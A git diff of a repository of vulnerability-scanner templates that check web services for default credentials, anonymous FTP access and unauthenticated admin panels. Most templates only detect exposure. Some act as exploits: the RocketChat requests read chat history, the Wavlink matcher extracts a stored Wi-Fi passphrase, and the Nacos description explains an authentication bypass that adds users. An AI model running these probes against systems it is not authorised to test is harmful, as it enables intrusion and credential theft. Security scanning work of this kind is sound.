"(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}" + +# digest: 4a0a00473045022100d0efec25fa4880fa1dcfdbb4303fc8bfeaddf4e62c15395ce9d0443c2d773e9702202bbf2fbd6b1be33572a5fa33d3a51876ae77d10a60a6474ff61bde7f6cdd3498:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/ucmdb-default-login-10868.yaml b/poc/auth/ucmdb-default-login-10868.yaml index 7f92b3251a..169611f6d5 100644 --- a/poc/auth/ucmdb-default-login-10868.yaml +++ b/poc/auth/ucmdb-default-login-10868.yaml @@ -4,8 +4,7 @@ info: name: Micro Focus Universal CMDB Default Login author: dwisiswant0 severity: high - description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 - and CVE-2020-11854. + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854. reference: - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm classification: diff --git a/poc/auth/ucmdb-default-login-10871.yaml b/poc/auth/ucmdb-default-login-10871.yaml new file mode 100644 index 0000000000..7f92b3251a --- /dev/null +++ b/poc/auth/ucmdb-default-login-10871.yaml @@ -0,0 +1,41 @@ +id: ucmdb-default-login + +info: + name: Micro Focus Universal CMDB Default Login + author: dwisiswant0 + severity: high + description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 + and CVE-2020-11854. + reference: + - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm + classification: + cwe-id: CWE-798 + tags: ucmdb,default-login + +requests: + - raw: + - | + POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1 + Host: {{Hostname}} + + customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB + + attack: pitchfork + payloads: + username: + - diagnostics + password: + - admin + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "LWSSO_COOKIE_KEY" + +# Enhanced by mp on 2022/03/07 diff --git a/poc/auth/ucmdb-default-login-10869.yaml b/poc/auth/ucmdb-default-login.yaml similarity index 100% rename from poc/auth/ucmdb-default-login-10869.yaml rename to poc/auth/ucmdb-default-login.yaml diff --git a/poc/auth/unauth-ftp-10939.yaml b/poc/auth/unauth-ftp-10939.yaml index e3c21171fa..4e68ffae34 100644 --- a/poc/auth/unauth-ftp-10939.yaml +++ b/poc/auth/unauth-ftp-10939.yaml @@ -1,23 +1,18 @@ id: unauth-ftp - info: name: FTP Anonymous Login - author: C3l3si4n + author: Celesian ( @C3l3si4n ) severity: medium - reference: - - https://tools.ietf.org/html/rfc2577 + reference: https://tools.ietf.org/html/rfc2577 tags: network,ftp - network: - inputs: - data: "USER anonymous\r\nPASS nuclei\r\n" - host: - - "{{Host}}:21" - "{{Hostname}}" - + - "{{Hostname}}:21" matchers: - type: word words: - "Anonymous access allowed," - part: response \ No newline at end of file + part: all diff --git a/poc/auth/unauth-ftp-10942.yaml b/poc/auth/unauth-ftp-10942.yaml deleted file mode 100644 index 12d9dba01b..0000000000 --- a/poc/auth/unauth-ftp-10942.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: unauth-ftp -info: - name: FTP Anonymous Login - author: C3l3si4n - severity: medium - reference: https://tools.ietf.org/html/rfc2577 - tags: network,ftp -network: - - inputs: - - data: "USER anonymous\r\nPASS nuclei\r\n" - host: - - "{{Host}}:21" - - "{{Hostname}}" - matchers: - - type: word - words: - - "Anonymous access allowed," - part: all diff --git a/poc/auth/unauth-hoteldruid-panel-10943.yaml b/poc/auth/unauth-hoteldruid-panel-10943.yaml deleted file mode 100644 index c30b9ab48e..0000000000 --- a/poc/auth/unauth-hoteldruid-panel-10943.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: unauth-hoteldruid-panel - -info: - name: Hoteldruid Management Panel Access - author: princechaddha - severity: high - description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. - reference: - - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42949.json - - https://www.hoteldruid.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - max-request: 2 - tags: hoteldruid,panel,unauth - -http: - - method: GET - path: - - "{{BaseURL}}/hoteldruid/inizio.php" - - "{{BaseURL}}/inizio.php" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - " HotelDruid " - - "INSERT:" - - "TABLES:" - condition: and - -# digest: 4b0a00483046022100b167cc0851722d7c32a687f0349ff4aeb493bfa181a2bafa03726b549b68c194022100a9e8558089ffe0f9a1b3900510ed9a46ed69d19f65e2e77f076e8dae01f1410a:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-hoteldruid-panel.yaml b/poc/auth/unauth-hoteldruid-panel.yaml new file mode 100644 index 0000000000..9897bff31a --- /dev/null +++ b/poc/auth/unauth-hoteldruid-panel.yaml @@ -0,0 +1,25 @@ +id: unauth-hoteldruid-panel +info: + name: Unauthenticated Hoteldruid Panel + author: princechaddha + severity: high + description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication. + reference: https://www.hoteldruid.com/ + tags: hoteldruid,panel,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/hoteldruid/inizio.php" + - "{{BaseURL}}/inizio.php" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + part: body + words: + - " HotelDruid " + - "INSERT:" + - "TABLES:" + condition: and diff --git a/poc/auth/unauth-message-read-10947.yaml b/poc/auth/unauth-message-read-10947.yaml index 5f53cf4e40..81cd8e1c7b 100644 --- a/poc/auth/unauth-message-read-10947.yaml +++ b/poc/auth/unauth-message-read-10947.yaml @@ -1,13 +1,26 @@ id: rocketchat-unauth-access + info: - name: RocketChat Unauthenticated Read Access + name: RocketChat Live Chat - Unauthenticated Read Access author: rojanrijal - severity: critical - description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens. + severity: high + description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens. + remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8. reference: - https://docs.rocket.chat/guides/security/security-updates + - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-522 + metadata: + max-request: 2 tags: rocketchat,unauth -requests: +variables: + value: "{{to_lower(rand_text_alpha(5))}}" + user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com" + +http: - raw: - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 @@ -16,22 +29,26 @@ requests: Content-Type: application/json Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"} + {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"} - | POST /api/v1/method.callAnon/cve_exploit HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} Content-Type: application/json - {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} + {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"} + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - '"{\"msg\":\"result\",\"result\":{\"messages\"' - '"success":true' - part: body condition: and + + - type: status + status: + - 200 + +# digest: 4b0a0048304602210095085dc96a7cb508eefb70fb2096b11370550b5fc48bf2778a9fe85c1c1d2726022100e82787c9db9e4546b785b8bd5997137083fc5de11cfbde2b2f1b775a62ef1ce2:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-spark-api-10963.yaml b/poc/auth/unauth-spark-api-10963.yaml index 504318c39a..5575a73ff9 100644 --- a/poc/auth/unauth-spark-api-10963.yaml +++ b/poc/auth/unauth-spark-api-10963.yaml @@ -3,26 +3,30 @@ id: unauth-spark-api info: name: Unauthenticated Spark REST API author: princechaddha - severity: medium + severity: critical description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: - https://xz.aliyun.com/t/2490 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. + metadata: + max-request: 1 tags: spark,unauth -requests: +http: - method: GET path: - "{{BaseURL}}/v1/submissions" + matchers-condition: and matchers: - type: status status: - 400 + - type: word words: - "Missing an action" @@ -30,4 +34,4 @@ requests: part: body condition: and -# Enhanced by cs on 2022/02/28 +# digest: 4a0a00473045022018b659baec610f87c26890d0fb5845caeb74f982b891f1d7962fc76f1cc74819022100fbbd51799d7374a2ec8d0ce526872a8541093e2d98a549188fca7c8890f25681:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-spark-api.yaml b/poc/auth/unauth-spark-api.yaml deleted file mode 100644 index 2025d7145b..0000000000 --- a/poc/auth/unauth-spark-api.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: unauth-spark-api -info: - name: Unauthenticated Spark REST API - author: princechaddha - severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - remediation: Restrict access the exposed API ports. - reference: https://xz.aliyun.com/t/2490 - tags: spark,unauth - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 -requests: - - method: GET - path: - - "{{BaseURL}}/v1/submissions" - matchers-condition: and - matchers: - - type: status - status: - - 400 - - type: word - words: - - "Missing an action" - - "serverSparkVersion" - part: body - condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/poc/auth/unauth-wavink-panel-10967.yaml b/poc/auth/unauth-wavink-panel-10967.yaml new file mode 100644 index 0000000000..3a38b04d8e --- /dev/null +++ b/poc/auth/unauth-wavink-panel-10967.yaml @@ -0,0 +1,48 @@ +id: unauth-wavink-panel + +info: + name: Wavlink Panel - Unauthenticated Access + author: princechaddha + severity: high + description: Wavlink Panel was able to be accessed with no authentication requirements in place. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"Wi-Fi APP Login" + tags: exposure,wavlink,unauth,misconfig,router + +http: + - method: GET + path: + - "{{BaseURL}}/wifi_base.shtml" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "APP" + + - type: regex + part: body + regex: + - 'var passphraseKey12="(.*)";' + + - type: word + part: body + negative: true + words: + - 'var passphraseKey12="";' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'var passphraseKey12="(.*)";' + +# digest: 4a0a00473045022001a73c92e30b7d3d758141d3c02a0556b645c3db302df3ec3d4cdcc924c4a9d70221009cb70454a96ce29bd3cbd76b6c13e1c5d16ec80883c57b37e6178534b653a869:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauth-xproxy-dashboard-10968.yaml b/poc/auth/unauth-xproxy-dashboard-10968.yaml deleted file mode 100644 index c7d01f13ff..0000000000 --- a/poc/auth/unauth-xproxy-dashboard-10968.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauth-xproxy-dashboard -info: - name: X-Proxy Dashboard Detect - author: pussycat0x - severity: high - metadata: - fofa-dork: "X-Proxy Dashboard" - tags: xproxy,panel -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'X-Proxy' - - 'Dashboard' - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/unauth-xproxy-dashboard-10969.yaml b/poc/auth/unauth-xproxy-dashboard-10969.yaml new file mode 100644 index 0000000000..2e76185f13 --- /dev/null +++ b/poc/auth/unauth-xproxy-dashboard-10969.yaml @@ -0,0 +1,27 @@ +id: unauth-xproxy-dashboard + +info: + name: X-Proxy Dashboard Detect + author: pussycat0x + severity: high + metadata: + fofa-dork: "X-Proxy Dashboard" + tags: xproxy,panel + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'X-Proxy' + - 'Dashboard' + condition: and + + - type: status + status: + - 200 diff --git a/poc/auth/unauth-xproxy-dashboard.yaml b/poc/auth/unauth-xproxy-dashboard.yaml index 2e76185f13..c7d01f13ff 100644 --- a/poc/auth/unauth-xproxy-dashboard.yaml +++ b/poc/auth/unauth-xproxy-dashboard.yaml @@ -1,5 +1,4 @@ id: unauth-xproxy-dashboard - info: name: X-Proxy Dashboard Detect author: pussycat0x @@ -7,12 +6,10 @@ info: metadata: fofa-dork: "X-Proxy Dashboard" tags: xproxy,panel - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word @@ -21,7 +18,6 @@ requests: - 'X-Proxy' - 'Dashboard' condition: and - - type: status status: - 200 diff --git a/poc/auth/unauthenticated-airflow-10884.yaml b/poc/auth/unauthenticated-airflow-10884.yaml new file mode 100644 index 0000000000..50ca17d92a --- /dev/null +++ b/poc/auth/unauthenticated-airflow-10884.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-airflow-instance + +info: + name: Unauthenticated Airflow Instance + author: dhiyaneshDK + severity: high + tags: apache,airflow,unauth + metadata: + shodan-query: title:"Airflow - DAGs" + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/admin/" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - DAGs" + + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-airflow-10886.yaml b/poc/auth/unauthenticated-airflow-10886.yaml deleted file mode 100644 index afe4ed1f3c..0000000000 --- a/poc/auth/unauthenticated-airflow-10886.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-airflow-instance -info: - name: Unauthenticated Airflow Instance - author: dhiyaneshDK - severity: high - metadata: - shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Airflow - DAGs" - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-airflow.yaml b/poc/auth/unauthenticated-airflow.yaml index 93eb15068c..afe4ed1f3c 100644 --- a/poc/auth/unauthenticated-airflow.yaml +++ b/poc/auth/unauthenticated-airflow.yaml @@ -1,31 +1,23 @@ id: unauthenticated-airflow-instance - info: name: Unauthenticated Airflow Instance author: dhiyaneshDK severity: high metadata: - max-request: 2 shodan-query: title:"Airflow - DAGs" - tags: apache,airflow,unauth,misconfig - -http: + tags: apache,airflow,unauth +requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/admin/" - stop-at-first-match: true - matchers-condition: and matchers: - type: word part: body words: - "Airflow - DAGs" - - type: status status: - 200 - -# digest: 4a0a004730450221008ff04d74351dc40542a499d88517999e66dc8504d16a8fa83df765ab850de2cc0220093c9335dd06ec425df7afb41e2306101fb637e6c30106c02891f8c001e7e805:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-alert-manager-10888.yaml b/poc/auth/unauthenticated-alert-manager-10888.yaml index e1036fc73c..b6de2aadd0 100644 --- a/poc/auth/unauthenticated-alert-manager-10888.yaml +++ b/poc/auth/unauthenticated-alert-manager-10888.yaml @@ -3,8 +3,7 @@ info: name: Unauthenticated Alert Manager author: dhiyaneshDK severity: high - reference: - - https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 + reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 tags: unauth,alertmanager requests: - method: GET diff --git a/poc/auth/unauthenticated-alert-manager-10892.yaml b/poc/auth/unauthenticated-alert-manager-10892.yaml deleted file mode 100644 index f4b978d825..0000000000 --- a/poc/auth/unauthenticated-alert-manager-10892.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: unauthenticated-alert-manager - -info: - name: Unauthenticated Alert Manager - author: dhiyaneshDK - severity: high - reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22 - tags: unauth,alertmanager - -requests: - - method: GET - path: - - "{{BaseURL}}/#/alerts" - - matchers-condition: and - matchers: - - type: word - words: - - 'Alertmanager' - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-frp-10895.yaml b/poc/auth/unauthenticated-frp-10895.yaml new file mode 100644 index 0000000000..a970101294 --- /dev/null +++ b/poc/auth/unauthenticated-frp-10895.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-frp +info: + name: Unauthenticated FRP + author: pikpikcu + severity: info + reference: + - https://github.com/fatedier/frp/ + tags: frp,unauth,panel +requests: + - method: GET + path: + - "{{BaseURL}}/static/" + matchers-condition: and + matchers: + - type: word + words: + - "frps dashboard" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-frp-10896.yaml b/poc/auth/unauthenticated-frp-10896.yaml index 33cf66b2af..804da1cc21 100644 --- a/poc/auth/unauthenticated-frp-10896.yaml +++ b/poc/auth/unauthenticated-frp-10896.yaml @@ -1,4 +1,5 @@ id: unauthenticated-frp + info: name: Unauthenticated FRP author: pikpikcu @@ -6,16 +7,20 @@ info: tags: frp,unauth,panel reference: - https://github.com/fatedier/frp/ # vendor homepage + requests: - method: GET path: - "{{BaseURL}}/static/" + matchers-condition: and matchers: + - type: word words: - "frps dashboard" part: body + - type: status status: - 200 diff --git a/poc/auth/unauthenticated-frp-10897.yaml b/poc/auth/unauthenticated-frp-10897.yaml deleted file mode 100644 index 804da1cc21..0000000000 --- a/poc/auth/unauthenticated-frp-10897.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: unauthenticated-frp - -info: - name: Unauthenticated FRP - author: pikpikcu - severity: info - tags: frp,unauth,panel - reference: - - https://github.com/fatedier/frp/ # vendor homepage - -requests: - - method: GET - path: - - "{{BaseURL}}/static/" - - matchers-condition: and - matchers: - - - type: word - words: - - "frps dashboard" - part: body - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-glowroot-10900.yaml b/poc/auth/unauthenticated-glowroot-10900.yaml index 7b724ea0ac..91ec9e0d7d 100644 --- a/poc/auth/unauthenticated-glowroot-10900.yaml +++ b/poc/auth/unauthenticated-glowroot-10900.yaml @@ -1,15 +1,20 @@ id: unauthenticated-glowroot + info: name: Glowroot Anonymous User author: pussycat0x severity: high description: Anonymous user access allows to understand the host internals - reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 + metadata: + max-request: 1 + shodan-query: http.title:"Glowroot" tags: misconfig,unauth,glowroot -requests: + +http: - method: GET path: - '{{BaseURL}}/backend/admin/users?username=anonymous' + matchers-condition: and matchers: - type: word @@ -18,10 +23,14 @@ requests: - '"Administrator"' - '"newPassword":""' condition: and + - type: word words: - "application/json" part: header + - type: status status: - 200 + +# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-glowroot-10902.yaml b/poc/auth/unauthenticated-glowroot-10902.yaml index 91ec9e0d7d..9660fba7a7 100644 --- a/poc/auth/unauthenticated-glowroot-10902.yaml +++ b/poc/auth/unauthenticated-glowroot-10902.yaml @@ -5,12 +5,10 @@ info: author: pussycat0x severity: high description: Anonymous user access allows to understand the host internals - metadata: - max-request: 1 - shodan-query: http.title:"Glowroot" + reference: https://www.shodan.io/search?query=http.title%3A%22Glowroot%22 tags: misconfig,unauth,glowroot -http: +requests: - method: GET path: - '{{BaseURL}}/backend/admin/users?username=anonymous' @@ -32,5 +30,3 @@ http: - type: status status: - 200 - -# digest: 490a00463044022019366c9de0a2a073adbbad6091fd850a52a5b2d56a5dd3ad2f0d39d9367bc01b02205cd93caca69d8f77cbf30f8643539c016d27c3a02de8520cbc25ede3a6a9e0e1:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-influxdb-10903.yaml b/poc/auth/unauthenticated-influxdb-10903.yaml new file mode 100644 index 0000000000..4cd617572a --- /dev/null +++ b/poc/auth/unauthenticated-influxdb-10903.yaml @@ -0,0 +1,27 @@ +id: unauthenticated-influxdb + +info: + name: Unauthentication InfluxDB Detection + author: pussycat0x + severity: high + metadata: + shodan-dork: InfluxDB + tags: unauth,db,influxdb,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"results":' + - '"name":"databases"' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/auth/unauthenticated-influxdb.yaml b/poc/auth/unauthenticated-influxdb.yaml index 063d0eedc5..9725f2a6e7 100644 --- a/poc/auth/unauthenticated-influxdb.yaml +++ b/poc/auth/unauthenticated-influxdb.yaml @@ -1,4 +1,5 @@ id: unauthenticated-influxdb + info: name: Unauthentication InfluxDB Detection author: pussycat0x @@ -6,10 +7,12 @@ info: metadata: shodan-dork: InfluxDB tags: unauth,db,influxdb,misconfig + requests: - method: GET path: - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES" + matchers-condition: and matchers: - type: word @@ -18,6 +21,7 @@ requests: - '"results":' - '"name":"databases"' condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/auth/unauthenticated-jenkins.yaml b/poc/auth/unauthenticated-jenkins.yaml index 1d4e284352..6461e48741 100644 --- a/poc/auth/unauthenticated-jenkins.yaml +++ b/poc/auth/unauthenticated-jenkins.yaml @@ -1,23 +1,27 @@ -id: unauthenticated-jenkins - -info: - name: Unauthenticated Jenkins Dashboard - author: dhiyaneshDK - severity: critical - tags: jenkins - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - Dashboard [Jenkins] - condition: and - - - type: status - status: - - 200 \ No newline at end of file +id: unauthenticated-jenkins + +info: + name: Unauthenticated Jenkins Dashboard + author: dhiyaneshDK + severity: high + metadata: + max-request: 1 + tags: jenkins + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - Dashboard [Jenkins] + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100811848566c0be01530924be02cd09bff4e6e70f54b2f9e5bf6d0f1818d8acd3a0220407f642622c3548af68ce0db4328b18a9d22cb1f916b7ed5c0e7ba7a000ac70e:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-mongo-express.yaml b/poc/auth/unauthenticated-mongo-express.yaml new file mode 100644 index 0000000000..6396514361 --- /dev/null +++ b/poc/auth/unauthenticated-mongo-express.yaml @@ -0,0 +1,23 @@ +id: unauthenticated-mongo-express +info: + name: Mongo Express Unauthenticated + author: dhiyaneshDK,b0rn2r00t + severity: high + reference: https://www.exploit-db.com/ghdb/5684 + tags: mongo,unauth +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/mongo-express/' + - '{{BaseURL}}/db/admin/system.users' + matchers-condition: and + matchers: + - type: word + words: + - 'Home - Mongo Express' + - 'system.users - Mongo Express' + condition: or + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-nacos-access-10912.yaml b/poc/auth/unauthenticated-nacos-access-10912.yaml new file mode 100644 index 0000000000..38b6ac2224 --- /dev/null +++ b/poc/auth/unauthenticated-nacos-access-10912.yaml @@ -0,0 +1,40 @@ +id: unauthenticated-nacos-access + +info: + name: Nacos 1.x - Authentication Bypass + author: taielab,pikpikcu + severity: critical + description: "Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data." + reference: + - https://github.com/alibaba/nacos/issues/4593 + - https://nacos.io/en-us/docs/auth.html + tags: nacos,unauth + +requests: + - method: GET + path: + - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" + - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" + headers: + User-Agent: Nacos-Server + + matchers-condition: and + matchers: + + - type: word + words: + - "Content-Type: application/json" + part: header + + - type: regex + regex: + - '"username":' + - '"password":' + part: body + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/20 diff --git a/poc/auth/unauthenticated-nacos-access-10915.yaml b/poc/auth/unauthenticated-nacos-access-10915.yaml deleted file mode 100644 index a5c75638f1..0000000000 --- a/poc/auth/unauthenticated-nacos-access-10915.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: unauthenticated-nacos-access - -info: - name: Unauthenticated Nacos access v1.x - author: taielab,pikpikcu - severity: critical - reference: https://github.com/alibaba/nacos/issues/4593 - tags: nacos,unauth - -requests: - - method: GET - path: - - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9" - - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" - headers: - User-Agent: Nacos-Server - - matchers-condition: and - matchers: - - - type: word - words: - - "Content-Type: application/json" - part: header - - - type: regex - regex: - - '"username":' - - '"password":' - part: body - condition: and - - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-nacos-access.yaml b/poc/auth/unauthenticated-nacos-access.yaml index c98d9ff317..a5c75638f1 100644 --- a/poc/auth/unauthenticated-nacos-access.yaml +++ b/poc/auth/unauthenticated-nacos-access.yaml @@ -1,10 +1,12 @@ id: unauthenticated-nacos-access + info: name: Unauthenticated Nacos access v1.x author: taielab,pikpikcu severity: critical reference: https://github.com/alibaba/nacos/issues/4593 tags: nacos,unauth + requests: - method: GET path: @@ -12,18 +14,22 @@ requests: - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9" headers: User-Agent: Nacos-Server + matchers-condition: and matchers: + - type: word words: - "Content-Type: application/json" part: header + - type: regex regex: - '"username":' - '"password":' part: body condition: and + - type: status status: - 200 diff --git a/poc/auth/unauthenticated-netdata.yaml b/poc/auth/unauthenticated-netdata.yaml index 0dc974421a..124b15aaad 100644 --- a/poc/auth/unauthenticated-netdata.yaml +++ b/poc/auth/unauthenticated-netdata.yaml @@ -1,26 +1,35 @@ id: unauthenticated-netdata + info: name: Unauthenticated Netdata author: dhiyaneshDk severity: medium reference: - https://github.com/netdata/netdata + metadata: + max-request: 1 tags: netdata,unauth,misconfig -requests: + +http: - method: GET path: - "{{BaseURL}}/api/v1/data?chart=system.cpu&format=json&points=125&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "view_update_every" - "dimensions" condition: and + - type: word words: - "application/json" part: header + +# digest: 4b0a00483046022100fc4242ebf2407e638e79765a478f330a7ef8474097273a381389cc4462e12a41022100a924453e95fb7f0d51fbc8dc4f797de4e8a286c27aa3202bdd2723b995633c36:922c64590222798bb761d5b6d8e72950 diff --git a/poc/auth/unauthenticated-popup-upload-10921.yaml b/poc/auth/unauthenticated-popup-upload-10921.yaml new file mode 100644 index 0000000000..5e5ec46c65 --- /dev/null +++ b/poc/auth/unauthenticated-popup-upload-10921.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-popup-upload +info: + name: Unauthenticated Popup File Uploader + author: DhiyaneshDk + severity: info + reference: + - https://www.exploit-db.com/ghdb/6671 + tags: fileupload,upload +requests: + - method: GET + path: + - "{{BaseURL}}/RichWidgets/Popup_Upload.aspx" + matchers-condition: and + matchers: + - type: word + words: + - "Popup Upload" + part: body + - type: status + status: + - 200 diff --git a/poc/auth/unauthenticated-popup-upload-10922.yaml b/poc/auth/unauthenticated-popup-upload.yaml similarity index 100% rename from poc/auth/unauthenticated-popup-upload-10922.yaml rename to poc/auth/unauthenticated-popup-upload.yaml diff --git a/poc/auth/unauthenticated-prtg-10924.yaml b/poc/auth/unauthenticated-prtg-10924.yaml deleted file mode 100644 index 35a224af4b..0000000000 --- a/poc/auth/unauthenticated-prtg-10924.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: unauthenticated-prtg -info: - name: Unauthenticated PRTG Traffic Grapher - author: dhiyaneshDK - severity: high - reference: https://www.exploit-db.com/ghdb/5808 - tags: config,unauth,prtg -requests: - - method: GET - path: - - "{{BaseURL}}/sensorlist.htm" - matchers-condition: and - matchers: - - type: word - words: - - 'PRTG Traffic Grapher' - condition: and - - type: status - status: - - 200 diff --git a/poc/auth/unauthenticated-prtg-10927.yaml b/poc/auth/unauthenticated-prtg-10927.yaml new file mode 100644 index 0000000000..1444ba22bb --- /dev/null +++ b/poc/auth/unauthenticated-prtg-10927.yaml @@ -0,0 +1,21 @@ +id: unauthenticated-prtg +info: + name: Unauthenticated PRTG Traffic Grapher + author: dhiyaneshDK + severity: high + reference: + 